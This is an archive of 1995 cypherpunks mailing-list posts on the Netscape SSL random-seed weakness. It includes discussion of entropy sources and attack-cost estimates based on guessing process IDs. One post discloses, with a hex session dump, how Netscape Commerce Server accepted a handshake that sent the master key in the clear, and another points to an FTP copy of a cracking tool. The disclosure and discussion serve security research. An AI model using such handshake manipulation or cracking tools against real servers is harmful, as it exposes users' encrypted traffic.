>> unload a bunch of shares at $45, a day before it dropped, now down to
>> around $36. "He who hesitates to act on inside information is lost.")
>
>This isn't inside information in the illegal-to-trade-on-in-the-US sense,
>is it?  cypherpunks, while maybe not mainstream, is publicly available.

Didn't you read my last line?

"(Yes, I know that I am not an "insider" by SEC definitions. Poetic license.)"

--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Sep 95 21:25:55 PDT
To: bdavis@thepoint.net
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509200424.AA18181@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>The question was, essentially, what do you think should happen to a 
>teenage hacker ...

Oops.  Sorry for the mistake.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Tue, 19 Sep 95 22:51:44 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To: <ac84f1b9250210046a05@[205.199.118.202]>
Message-ID: <Pine.3.89.9509200017.B1346-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:

> Still, his writing style and some of his points seem close enough to some
> of my own points, not to mention his Northern California nexus and
> estimated age, that I'm expecting more inquiries (I deflected one already).
> 
> After the call from the Sheriff's office about my alleged activities, I
> wonder....

Tim May, the UNABOMBER ... too funny for words, hehehe ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 00:29:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200729.AAA24565@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



|   Of course none of this reduces the magnitude of the screw up/bug/design
| flaw/whatever.  I really can't say which of these it was since I wasn't
| around at the time that this code was being written.  I must admit that
| the RNG seed code was not an area that I thought to examine when I took
| over our security library.

It isn't really easy. I guess you were around to see the pointer to
RFC 1750, approx "Security Randomness reqs"?

|   This was a bad mistake on our part, and we are working hard to fix it.
| We have been trying to identify sources of random bits on PCs, Macs, and
| all of the many unix platforms we support.  We are looking at stuff that
| is system dependent, user dependent, hardware dependent, random external
| sources such as the network and the user.  If anyone has specific
| suggestions I would love to hear them so that we can do a better job.

* I think you should use as much user-generated randomness as possible,
  like the mouse movement patterns, interarrival times of events from
  the user interface etc.

* You can also gather statistics from the networking card, like number
  of collisions, packets in/out, number of passing packets etc.

* Measuring the interarrival times of requests/responses from a remote
  server should also be a good one, I guess. I depends on the network
  in between, the actual processes executing on it, the scheduling
  algorithm etc.

* And finally, insert some sampling of the noise in the sound blaster.

* And try to reseed it, as often as possible and convenient. Make it 
  depend on the previous value of the random generator seed, somehow.

The difficult part is to verify the quality of the random seeding and
reseeding. How does it behave on a unloaded system? Could someone put
your system under some strain, and hence affect the random generator
to lock down into a small subspace or even onto a fixed value?

How independant are the values anyway? And when you start to talk
about ergodity etc, I'm lost anyway. :-)

I think it is important to bring together factors of the user _and_
the environment, preferrable an environment that reaches as far from
the local site as possible. This makes "jamming" of the random seed
selection process harder. 

The other problem in gathering random bits for a seed is that most
bits are visible by someone else close enough within your environment.
Interarrival times of packets are fine, but anyone can observe them
with quite a good accuracy. How do you escape the "local environment
problem"? 

                              . - .

One wild idea that I just got was to have servers and clients exchange
random numbers (not seeds of course), in a kind of chaining way. Since
most viewers connect to a number of servers, and all servers are
connected to by many clients, they would mix "randomness sources" with
each other, making it impossible to observe the local environment
only. And the random values would of course be encrypted under the
session key, making it impossible to "watch the wire".

Problems:
* watch out for "multiply by zero" attacks by a rogue server/client.
* watch out for "almost singular values" in the same way.
* only let one source contribute a certain amount of randomness, like
  (key length)/(aver # of peers).
* never reveal your current seed, only a non-trivially derived random 
  value from it. (of course)
* make sure your initial seed is good enough, or the whole thing is
  broken.
* perhaps save part of the previous session state into a protected
  file, to be able to keep up the quality of the initial seed.

I think I like it, perhaps not from a practical point of view as much
as the 'non-attackability' of it. Its quite cypher-a. 

But I bet someone has already done this a long time ago. My usual
luck! :-(

If not, I want a 'I saved Netscape!' t-shirt from you, Jeff! 
 
/Christian

PS. I'm a Swede, I don't know if I'm allowed to reveal these state
secrets. So please shut your eyes, ok?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 20 Sep 95 00:18:58 PDT
To: cypherpunks@toad.com
Subject: Netscape sub rosa?
Message-ID: <ac850f682a021004638e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 AM 9/20/95, Alan Olsen wrote:
>At 03:06 PM 9/19/95 -0500, you wrote:
>>NPR reported on the security flaw in Netscape,
>>
>>3:05 pm CDT.
>
>As well as CNN Headline news.  (With the big Netscape N logo and
                                          ^^^^^^^^^^^^^^^^^^^
>everything.)  They spent a fair amount of time (for CNN Headline news) on
>the story.

Gee, where's that "Cypherpunks logo" when you really need it?

A rose covering the Netscape "N" logo? A crypto eagle swooping down and
pecking at weak keys?

Netscape sub rosa?

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Wed, 20 Sep 95 00:38:41 PDT
To: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To: <Pine.3.89.9509200017.B1346-0100000@khijol>
Message-ID: <199509200738.AAA25102@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| On Tue, 19 Sep 1995, Timothy C. May wrote:
| 
| > Still, his writing style and some of his points seem close enough to some
| > of my own points, not to mention his Northern California nexus and
| > estimated age, that I'm expecting more inquiries (I deflected one already
).
| > 
| > After the call from the Sheriff's office about my alleged activities, I
| > wonder....
| 
| Tim May, the UNABOMBER ... too funny for words, hehehe ;)

A frame-up, I bet! What bothers me is that the it makes sense from a
certain twisted kind of view. Discrediting the group that actually
is a problem when it comes to ITAR, and recently has had good
publicity. And Tim being one of those who spotted Clipper coming,
early on. 

And the punch line; 
  "Look the terrorists and the crypto anarchists are the SAME guys!"


(Tim, not that I agree with your political views, but many Swedes
are like that. ;-) )

Why is it that my conspirational sides has blossomed once I joined
this group? I've posted more severely conspiritional posts recently
than I've done in my whole previous Inet presence. I gotta stop. :-)

/Christian







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 00:45:44 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200740.AAA15940@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



>   Is this offer good for netscape employees?  What if I post the code
> without having had to decompile it?   :-)
> 

	That depends on whether or not you do it with the approval of
your superiors. ;-)

	Seriously, if you manage to convince the
management/whoever-needs-to-decide a significant portion of the
security code can be released for public scrutiny, you deserve a
t-shirt.
	The goal here is to have a piece of software we can trust.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Tue, 19 Sep 95 15:45:31 PDT
To: sameer <sameer@c2.org>
Subject: A Netscape Server implementation error
Message-ID: <305F486F@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi Sameer

Thanks in advance for the T-shirt, and I like the Web site. On the   
subject of Netscape implementation errors, I note that the SSL protocol   
specification states in section 5.6.1 (CLIENT-MASTER-KEY) that "It is   
also an error if CLEAR-KEY-LENGTH is non-zero and the the CIPHER-KIND is   
not an export cipher".

However, I note that Netscape Commerce Server 1.1 will happily accept a   
"secure" connection using the non-export cipher SSL_CK_RC4_128_WITH_MD5,   
even if the CLEAR-KEY-LENGTH is set to 16 and the *entire* master key is   
sent unencrypted.

Here is an extract from an SSL session with www.netscape.com which   
illustrates the oversight:

 ------------------------------- Start of Session   
 ---------------------------

(1) The session was initialised as normal, and the following values were   
exchanged in the SERVER-HELLO and CLIENT-HELLO:

Challenge:
a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c

Connection id:
ef 47 3b 44 db d9 8d 1a f0 da 3e 14 73 97 a3 1f

(2) I then sent the following CLIENT-MASTER-KEY message, which is   
reproduced in full:

SSL Record Header:
80 9a

Message type: SSL_MT_CLIENT_MASTER_KEY
02

Cipher kind: SSL_CK_RC4_128_WITH_MD5
01 00 80

Clear key length: 16
00 10

Encypted key length: 128 bytes
00 80

Key arg length: 0
00 00

Clear key data: the *entire* master key sent in the clear
af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3

Encrypted key: this is a zero-length block formatted using PKCS#1 block   
type 2 and encrypted under Netscape's public key. Since it contains no   
data, an eavesdropper would not need to decrypt it in order to decrypt   
the rest of the session.

af 24 2e e8 2b b1 75 d1 27 a2 b8 76 8b 49 c3 f3
9b 9b 0b ff cd e8 2f 2c 0d 16 4e 90 73 26 4e e7
e0 3f 45 8a ce 9a 21 d6 2a 6b b8 9a 20 4e bc cf
d0 01 36 86 1c db e0 8b a8 e3 4c 9b 15 11 ea 95
b1 50 3f c9 42 9a 97 77 0f 9d 29 97 7e 87 1b 8f
77 b6 c9 c6 53 90 5b 74 4c 92 99 62 ad 8b bf 4c
28 ac 1b 11 32 64 56 c9 f0 d5 6f c9 89 6b 55 3f
b9 42 aa 7b 7c f0 a1 89 93 22 13 46 e2 58 63 23
b2 51 83 92 76 46 05 65 87 86 5b 52 5a d1 02 ee

(3) I calculated the session keys in the normal manner, using the master   
key which was sent entirely in the clear. The result was:

Client read key:
14 3e 84 a6 54 57 d6 51 94 cf 54 f5 5a 29 4a ef

Client write key:
9d e1 16 77 92 ee 89 f2 2d 30 c2 a2 e1 77 9f 5d

(4) Instead of disconnecting, the Netscape server sent the following   
reply (the header has been removed):

28 40 00 75 b8 d6 60 68 f5 cf ba 65 78 49 35 83
d3 3a b5 d3 81 23 2d f8 7d c6 f8 47 4d 0c 62 c3
b4

This was decrypted using the client read key to give the following   
SERVER_VERIFY message:

Message Authentication Code:
7b 95 2a 84 a1 55 fc 59 32 6b 53 ec e0 1d 80 4a

Message type: SSL_MT_SERVER_VERIFY
05

Challenge data (which agrees with the challenge sent in the   
CLIENT-HELLO):
a2 ff 2e 94 8d f9 f4 e2 2c f6 bd ae 7f 47 db 6c

(5) The negotiation phase of the protocol was concluded with encrypted   
CLIENT-FINISHED and SERVER_FINISHED messages as per normal.

(6) I sent the encrypted HTTP command "GET / HTTP/1.0" and received the   
following text (after decryption, stripping MAC and header, etc:

HTTP/1.0 200 OK
Server: Netscape-Commerce/1.1
Date: Tuesday, 19-Sep-95 21:15:23 GMT
Last-modified: Tuesday, 19-Sep-95 21:14:09 GMT
Content-length: 5278
Content-type: text/html

Followed by the Netscape home page, which included the following   
statement:

Find out how   
Netscape is responding immediately to upgrade customers and minimize risk   
of future threats.

(7) Having obtained the warm, fuzzy feeling I so desired, I closed the   
connection secure in the knowledge that my secrets were safe with   
Netscape.

 -------------------------------- End of Session   
 -----------------------------

This shows that Commerce Server 1.1 is prepared to accept a "secure"   
connection which is completely insecure as the entire master key has been   
sent in the clear and an eavesdropper could decrypt the session without   
any cryptanalysis.

This does not mean that sessions between "well-behaved" browsers and   
Netscape servers are insecure, since the browser will send all 16 bytes   
of the key encrypted. Neither could it be used for an active attack,   
since if a new master was substituted for the one sent by the client,   
this would be detected during authentication of the SERVER-VERIFY   
message.

However, it would provide an opportunity for a malicious browser supplier   
to "doctor" secure browsers so that they sent all (or part) of the master   
key in the clear, even when using non-export ciphers. (Of course there   
are better ways to do this; the "random padding" of PKCS block type 2   
comes to mind).

Although this is not nearly as important a result as Ian and Davids, it   
is the first server hack, so can I have another T shirt?  :-)

Andrew
________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 00:58:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: netscape's response
In-Reply-To: <ac85072c28021004746c@[205.199.118.202]>
Message-ID: <9509200055.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


  Just a clarification of my last message.  I didn't mean to imply that
we didn't know about using time/position from mouse events, RFC 1750,
reading from the microphone.  I knew all about this stuff, but made
the fatal mistake of assuming that what we shipped in 1.1 was
"good enough", and that I could look at it later, after I had dealt
with a bunch of other stuff that needed to be done.

  So far I've received several very thoughtful replies, with lots of good
suggestions, most of which I already knew about, but some new ones too.

  Thanks to those who have responded already, and also to those who
will respond.  I'm sorry, but I can't guarantee an individual response...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:17:15 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509200812.BAA17876@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   If the attacker does not have access to the machine to determine the
> pid and ppid, then the attack will take longer.  If the Navigator
> is running on an SGI machine with a high resolution cycle counter then
> it is used as the first of the two 32bit seeds.

	The release mentioned "computation time". In my book that
doesn't include the setup time involved in figureing out how to snag
the packets, sending the sendmail spoofs in order to approximate the
pid and ppid, etc.

>   I believe that it would take much longer than 1 minute to mount an
> attack against a mac, pc, or unix machine that the attacker was not

	"time to mount an attack" is not "computation time".

	I'm really not debating with -you- though here, just
describing how the release was inaccurate. I don't deny any of your
statements

> logged on to.  I don't know exactly how the few hour number was
> calculated, since it was done by marketing with input from someone else
> in the group.  Another interesting data point is that the unix version,
> which was most vulnerable, accounts for less than 10% of our user
> base, according to the yahoo random link stats.

	Is UNIX really the most vulnerable? How many bits did the
tickcount account for? Seems to me that guessing just time & tick
would be easier than guessing time, pid and ppid if you are not logged
into the machine in question. . .

> 
>   Of course none of this reduces the magnitude of the screw up/bug/design
> flaw/whatever.  I really can't say which of these it was since I wasn't
> around at the time that this code was being written.  I must admit that
> the RNG seed code was not an area that I thought to examine when I took
> over our security library.

	I don't know what your background is, so don't take this as a
personal attack please, but someone who is trained in computer
security and cryptography implementation should *know* to check these
things. Hell, even I would check those things, and I'm not a
cryptographer by any means.

> 
>   This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support.  We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user.  If anyone has specific
> suggestions I would love to hear them so that we can do a better job.
> 

	Again, Kudos to Netscape for the quick response.

> > 	A group which offered to review the first version, but
> > Netscape refused.
> 
>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?  I think that it
> is unrealistic to expect us to release all of our source code to the
> net.  

	I was referring to Jim Bidzos's comment, posted to
cypherpunks. 
	The release I will be sending out is written much more cleanly
than what I initially posted to cypherpunks.

> 
>   We will be having at least some of our code reviewed by a
> wider audience, but I don't yet know which code, or how wide a review
> group.  If anyone has specific suggestions for pieces of code that
> you would like to see widely reviewed (such as RNG and seed generation)
> let me know.

	Great! 

> 
>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

	Ah but who's to stop an anonymous posting. nudgenudge. ;)
(This is a -joke-, for those excessively humor impaired)

> > 	From their release it looks like they aren't finding a better
> > source of entropy, but just using *more* sources of entropy. Doesn't
> > mean that the entropy is good.
> 
>   I would love to hear your suggestions for good sources of entropy
> on any systems that our products run on.

	When I wrote that sentence I misread the release -- my
apologies-- my initial reading gave me the impression that the only
thing that was being done was increasing the key size to 300 with no
additional work towards finding sources of randomness, which you have
said you were working on.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:23:47 PDT
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE
Message-ID: <199509200818.BAA18511@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Sept. 20, 1995
For Immediate Release
Contact: Sameer Parekh 510-601-9777

COMMUNITY CONNEXION CORRECTS INACCURACIES IN NETSCAPE PRESS RELEASE

In response to Ian Goldberg and David Wagner's recent cryptanalysis
and defeat of Netscape Navigator's security, Netscape Communications
Corporation has recently issued a press release describing the work
Ian and David had done, announced a fix, and offered comments on what
they felt were the implications on the security of their software.

Community ConneXion congratulated Netscape Communications Corporation
today for their quick response to this security problem. The fact that
they responded to the problem within two days of its publication
reflects well upon their responsiveness to the internet community,
said Sameer Parekh, Community ConneXion founder.

Sameer noted, however, that their release contained a number of
inaccuracies. He wrote a document detailing the inaccuracies that he
found, available via the World-Wide-Web at
http://www.c2.org/hacknetscape/critique.phtml.

He noted that they overestimated the time necessary to exploit the bug
by roughly two orders of magnitude. The description of the bug was
also flawed, said Sameer. Finally, he described how the solution
Netscape was presenting to the problem was viewed by many members of
the internet security community as only a partial fix.

"Millions of customers and their sensitive information are at
stake. Had Ian and Dave been criminals rather than honest students,
they might have taken this opportunity to steal credit card numbers,
snoop on people's financial transactions, and possibly more."

"Are we going to take the chance that the next person who finds a
Netscape bug may be someone who would rather steal lots of money than
win some T-shirt?" asked Sameer, referring to the T-shirt promotion
his company has developed, offering free T-shirts to people who have
found holes in Netscape security software.

Community ConneXion is the premier internet privacy ISP. They offer
anonymous accounts, remailers, and psuedonym servers, in addition to
the standard ISP fare of webspace and dialup IP access. Information is
available from http://www.c2.org or mailing info@c2.org.

Netscape and Netscape Navigator are trademarks of Netscape
Communications Corporation.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 01:31:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <199509200825.BAA18996@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things.

	Upon consideration, I am going to retract this statement-- I
suppose you can't check -everything-. (I still blame Netscape for
shoddy crypto in the first place, just not Jeff in particular)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 01:42:47 PDT
To: Christian Wettergren <cwe@csli.stanford.edu>
Subject: Re: netscape's response
In-Reply-To: <199509200729.AAA24565@Csli.Stanford.EDU>
Message-ID: <9509200139.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 12:29am, Christian Wettergren wrote:
> Subject: Re: netscape's response
> One wild idea that I just got was to have servers and clients exchange
> random numbers (not seeds of course), in a kind of chaining way. Since
> most viewers connect to a number of servers, and all servers are
> connected to by many clients, they would mix "randomness sources" with
> each other, making it impossible to observe the local environment
> only. And the random values would of course be encrypted under the
> session key, making it impossible to "watch the wire".

  Wow, this is a great idea!!  SSL already sends various encrypted
random values back and forth between client and server, so this
may not be too hard to implement without changing the protocol.
I'll keep it in the back of my mind for when I have some time...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 00:02:32 PDT
To: cypherpunks@toad.com
Subject: Netscape closes UNCHANGED!
Message-ID: <199509200701.AAA09989@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


NSCP is currently trading at $53 3/8 

Symbol        : NSCP        Exchange    : NASDAQ

Description   : NETSCAPE COMMUNICATIONS CORP COM             

Last Traded at: 53 3/8      Date/Time   : Sep 19  4:00   
$ Change      : 0           % Change    : 0.000000    

Bid           : 53 1/4      Ask         : 53 1/2      
Volume        : 373500      # of Trades : 470         
Opening Price : 49 1/4      Last Shares : 21          
Day Low       : 49          Day High    : 53 1/2      
52 Week Low   : 45 3/4      52 Week High: 74 3/4 
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 19 Sep 95 17:45:12 PDT
To: cypherpunks@toad.com
Subject: Re: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To: <199509190006.RAA28102@infinity.c2.org>
Message-ID: <199509200045.CAA12207@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Please do not export.

ftp://utopia.hacktic.nl/pub/incoming





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 02:52:20 PDT
To: sameer <sameer@c2.org>
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <9509200248.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  1:12am, sameer wrote:
> >   I believe that it would take much longer than 1 minute to mount an
> > attack against a mac, pc, or unix machine that the attacker was not
> 
> 	"time to mount an attack" is not "computation time".
> 
> 	I'm really not debating with -you- though here, just
> describing how the release was inaccurate. I don't deny any of your
> statements

  The issue is that any statement that only mentions the 1 minute figure
is only stating part of the story, just as a statement giving a figure
of several hours is only mentioning a part of the story.  All of the
news articles I've seen (not an exhaustive sample) have only mentioned
the 1 minute number, which only really effects a relatively small
number of our customers.

  If you don't know the pid and ppid, or the tick count in the case of
Mac/PC, you will have to add them to your search, which could make it
take much longer than 1 minute to crack.  If you assume that the unix
machine has been up for a while and has a decent turnover of processes
(not a valid assumption for determining strength) then you would have
to search on average half of 16 bit pid space, and then add a few bits
for the ppid(assuming that it is likely to be close to the pid).

  Even if you only got 8 extra bits from pid and ppid, that turns your
one minute attack into a several hour attack. 

  Anyway, I'm not trying to say that "several hours" is the only answer,
just that it is just as good an answer as "one minute".  As far as I
know, no one has tried this attack without knowing the pids.

> 
> > logged on to.  I don't know exactly how the few hour number was
> > calculated, since it was done by marketing with input from someone else
> > in the group.  Another interesting data point is that the unix version,
> > which was most vulnerable, accounts for less than 10% of our user
> > base, according to the yahoo random link stats.
> 
> 	Is UNIX really the most vulnerable? How many bits did the
> tickcount account for? Seems to me that guessing just time & tick
> would be easier than guessing time, pid and ppid if you are not logged
> into the machine in question. . .

  This is really dependent on how long window has been running.  If you
boot windows and immediately start an ssl connection, then the number
will be pretty low, but if you don't make the first SSL connection until
later, it should get better.  I think an hour would get you around 16-bits,
but this is just a guestimate on my part.  If you leave your machine
running windows for days you will get close to 32bits.

> >   Do you mean that cypherpunks offered to review the netscape code
> > if only we made all the source available on the net?  I think that it
> > is unrealistic to expect us to release all of our source code to the
> > net.  
> 
> 	I was referring to Jim Bidzos's comment, posted to
> cypherpunks. 
> 	The release I will be sending out is written much more cleanly
> than what I initially posted to cypherpunks.

  We had a conference call with RSA folks tuesday, and they will be in
wednesday to take a look at our fix.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 02:58:26 PDT
To: sameer <sameer@c2.org>
Subject: Re: netscape's response
In-Reply-To: <199509200825.BAA18996@infinity.c2.org>
Message-ID: <9509200254.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  1:25am, sameer wrote:
> Subject: Re: netscape's response
> > but someone who is trained in computer
> > security and cryptography implementation should *know* to check these
> > things.
> 
> 	Upon consideration, I am going to retract this statement-- I
> suppose you can't check -everything-. (I still blame Netscape for
> shoddy crypto in the first place, just not Jeff in particular)

  It turns out that Taher Elgamal and I started working here within
a week of each other, about 6 months ago.  Neither of us thought to
take a serious look at the RNG seed code.  I don't think that anyone
would accuse Taher of being an amateur in this area.

  I for one just didn't think about it enough to realize that while
we got the RNG code from RSA, they did not provide seed code.

  As for my background, I am not a trained cryptographer, but I do
understand protocols, did some internet security work as a sysadmin
while in school, and have had a casual interest in crypto stuff
for several years.  If you want the gory details see my web page...

	--Jeff


-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 20 Sep 95 03:06:04 PDT
To: cypherpunks@toad.com
Subject: Please send me SSL problems...
Message-ID: <199509201004.DAA23933@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  I'd just like to let all cypherpunks know that I'm really interested in
getting any feedback you might have about security problems with Netscape
products.  I'm particularly interested in bugs in the our implementation
of SSL, and problems in the protocol that are not addressed in SSL 3.0.

  We have been collecting comments on SSL 3.0, and have started incorporating
that feedback into our spec.  Please don't assume that our lack of response
means that we are ignoring your comments.  Between Navigator 2.0 and
things like the SSL challenge and the RNG fire drill, we just have not had
the time to get a new rev of the spec out.  Hopefully soon...

  I should also warn folks that Navigator 2.0 will not include SSL 3.0.
We just don't have time to do it.  It will become a high priority for us
after 2.0 goes out, or maybe sooner depending on hiring.

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 01:55:20 PDT
To: TheXGrrrl@aol.com
Subject: C'Punks meet the T*'s, T*'s meet the C'Punks!
Message-ID: <199509200855.BAA25899@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

   Washington, DC is not a cyberpunk town. 
   TheXGrrrl  (Jessica Xavier) 

You are absolutely right. It's not a cyberpunk town.
It's a cypherpunk town, and I ultimately deal in munitions.

PGP, the program that signed this message, is a munition.
It's illegal to export the stuff. So good, the military uses it.
I will teach everyone how to use it, and make what's called:

A WEB OF TRUST!

Having a ninety person web of trust, will get you farther
than millions and millions of dollars. This is affectionately
known as "a reputation market". I started a small transgendered
reputation market last winter. It has yet to be broken. 

A TRANSGENDER WEB OF TRUST, can and will do more than HRCF ever
dreamed of. And in no time at all! Once you make and start to 
sign other persons keys, THEN YOU CAN RELY on what is coming to
your computer, and THEY CAN RELY on what is coming from you.

This is what the Human Rights Campaign Fund has relied on:
They have relied on us being in a web of omission!
They have relied on us worrying about being in error!
The result is that we are out of The Employment Nondiscimination Act.

